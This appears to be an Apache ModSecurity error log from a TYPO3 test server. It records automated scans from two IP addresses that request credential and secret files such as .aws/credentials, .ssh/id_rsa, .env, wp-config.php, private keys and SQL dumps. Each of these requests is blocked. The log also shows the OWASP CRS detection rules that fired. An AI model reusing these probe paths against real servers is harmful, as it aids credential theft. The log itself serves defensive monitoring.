[Tue Aug 05 16:45:23.337304 2025] [:error] [pid 1726080] [client 213.232.87.232:13915] [client 213.232.87.232] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJIZA7c9ecSPu2_lPkPoVgAAABY"]
[Tue Aug 05 16:45:23.337522 2025] [:error] [pid 1726080] [client 213.232.87.232:13915] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJIZA7c9ecSPu2_lPkPoVgAAABY"]
[Tue Aug 05 16:45:23.337657 2025] [:error] [pid 1726080] [client 213.232.87.232:13915] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJIZA7c9ecSPu2_lPkPoVgAAABY"]
[Tue Aug 05 16:45:23.337752 2025] [authz_core:error] [pid 1726068] [client 213.232.87.232:40271] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database_backup.sql
[Tue Aug 05 16:45:23.339058 2025] [:error] [pid 1726071] [client 213.232.87.232:46233] [client 213.232.87.232] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aJIZA29G0rxkfqZzW3PNQgAAAAk"]
[Tue Aug 05 16:45:23.339196 2025] [:error] [pid 1726071] [client 213.232.87.232:46233] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aJIZA29G0rxkfqZzW3PNQgAAAAk"]
[Tue Aug 05 16:45:23.339370 2025] [:error] [pid 1726071] [client 213.232.87.232:46233] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aJIZA29G0rxkfqZzW3PNQgAAAAk"]
[Tue Aug 05 16:45:23.342496 2025] [:error] [pid 1726070] [client 213.232.87.232:3895] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aJIZA_8AUwGiCLARHH44lAAAAAg"]
[Tue Aug 05 16:45:23.342614 2025] [:error] [pid 1726070] [client 213.232.87.232:3895] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aJIZA_8AUwGiCLARHH44lAAAAAg"]
[Tue Aug 05 16:45:23.342742 2025] [:error] [pid 1726070] [client 213.232.87.232:3895] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aJIZA_8AUwGiCLARHH44lAAAAAg"]
[Tue Aug 05 16:45:23.342882 2025] [:error] [pid 1726070] [client 213.232.87.232:3895] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aJIZA_8AUwGiCLARHH44lAAAAAg"]
[Tue Aug 05 16:45:23.344228 2025] [authz_core:error] [pid 1720188] [client 213.232.87.232:9261] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Tue Aug 05 16:45:23.605293 2025] [authz_core:error] [pid 1726071] [client 213.232.87.232:31385] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Tue Aug 05 16:45:23.609452 2025] [authz_core:error] [pid 1726080] [client 213.232.87.232:46577] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Tue Aug 05 16:45:23.697462 2025] [:error] [pid 1720188] [client 213.232.87.232:51637] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJIZA9s8dgxaRXXIlrrBFQAAAA0"]
[Tue Aug 05 16:45:23.697597 2025] [:error] [pid 1720188] [client 213.232.87.232:51637] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJIZA9s8dgxaRXXIlrrBFQAAAA0"]
[Tue Aug 05 16:45:23.697787 2025] [:error] [pid 1720188] [client 213.232.87.232:51637] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJIZA9s8dgxaRXXIlrrBFQAAAA0"]
[Tue Aug 05 16:45:23.697930 2025] [:error] [pid 1720188] [client 213.232.87.232:51637] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJIZA9s8dgxaRXXIlrrBFQAAAA0"]
[Tue Aug 05 16:45:23.701474 2025] [:error] [pid 1726070] [client 213.232.87.232:29807] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJIZA_8AUwGiCLARHH44lQAAAAg"]
[Tue Aug 05 16:45:23.701640 2025] [:error] [pid 1726070] [client 213.232.87.232:29807] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJIZA_8AUwGiCLARHH44lQAAAAg"]
[Tue Aug 05 16:45:23.701796 2025] [:error] [pid 1726070] [client 213.232.87.232:29807] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJIZA_8AUwGiCLARHH44lQAAAAg"]
[Tue Aug 05 16:45:23.703788 2025] [authz_core:error] [pid 1726078] [client 213.232.87.232:10919] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Tue Aug 05 16:45:23.704148 2025] [authz_core:error] [pid 1726075] [client 213.232.87.232:64179] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Tue Aug 05 16:45:23.888906 2025] [authz_core:error] [pid 1726069] [client 213.232.87.232:17105] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Tue Aug 05 16:45:23.974391 2025] [:error] [pid 1726071] [client 213.232.87.232:14355] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aJIZA29G0rxkfqZzW3PNRAAAAAk"]
[Tue Aug 05 16:45:23.974707 2025] [:error] [pid 1726071] [client 213.232.87.232:14355] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aJIZA29G0rxkfqZzW3PNRAAAAAk"]
[Tue Aug 05 16:45:23.974899 2025] [:error] [pid 1726071] [client 213.232.87.232:14355] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aJIZA29G0rxkfqZzW3PNRAAAAAk"]
[Tue Aug 05 16:45:23.977191 2025] [authz_core:error] [pid 1726080] [client 213.232.87.232:12177] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Tue Aug 05 16:45:24.030453 2025] [authz_core:error] [pid 1729069] [client 213.232.87.232:49543] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Aug 05 16:45:24.055195 2025] [:error] [pid 1724073] [client 213.232.87.232:28607] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aJIZBD230dNCddo5vZBiBgAAAAA"]
[Tue Aug 05 16:45:24.055475 2025] [:error] [pid 1724073] [client 213.232.87.232:28607] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aJIZBD230dNCddo5vZBiBgAAAAA"]
[Tue Aug 05 16:45:24.055617 2025] [:error] [pid 1724073] [client 213.232.87.232:28607] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aJIZBD230dNCddo5vZBiBgAAAAA"]
[Tue Aug 05 16:45:24.061127 2025] [authz_core:error] [pid 1726075] [client 213.232.87.232:47979] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Tue Aug 05 16:45:24.070575 2025] [:error] [pid 1720188] [client 213.232.87.232:29941] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJIZBNs8dgxaRXXIlrrBFgAAAA0"]
[Tue Aug 05 16:45:24.070725 2025] [:error] [pid 1720188] [client 213.232.87.232:29941] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJIZBNs8dgxaRXXIlrrBFgAAAA0"]
[Tue Aug 05 16:45:24.070885 2025] [:error] [pid 1720188] [client 213.232.87.232:29941] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJIZBNs8dgxaRXXIlrrBFgAAAA0"]
[Tue Aug 05 16:45:24.190250 2025] [:error] [pid 1726080] [client 213.232.87.232:9375] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aJIZBLc9ecSPu2_lPkPoWQAAABY"]
[Tue Aug 05 16:45:24.190575 2025] [:error] [pid 1726080] [client 213.232.87.232:9375] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aJIZBLc9ecSPu2_lPkPoWQAAABY"]
[Tue Aug 05 16:45:24.190726 2025] [:error] [pid 1726080] [client 213.232.87.232:9375] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aJIZBLc9ecSPu2_lPkPoWQAAABY"]
[Tue Aug 05 16:45:24.199897 2025] [:error] [pid 1729069] [client 213.232.87.232:28257] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJIZBKANRD0b5ZESQb0y4wAAAAE"]
[Tue Aug 05 16:45:24.200093 2025] [:error] [pid 1729069] [client 213.232.87.232:28257] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJIZBKANRD0b5ZESQb0y4wAAAAE"]
[Tue Aug 05 16:45:24.200245 2025] [:error] [pid 1729069] [client 213.232.87.232:28257] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJIZBKANRD0b5ZESQb0y4wAAAAE"]
[Wed Aug 06 03:32:49.046170 2025] [:error] [pid 1739941] [client 213.209.143.116:43434] [client 213.209.143.116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJKwwQfN7XRSOYx3P0MdbwAAAAU"]
[Wed Aug 06 03:32:49.046410 2025] [:error] [pid 1739941] [client 213.209.143.116:43434] [client 213.209.143.116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJKwwQfN7XRSOYx3P0MdbwAAAAU"]
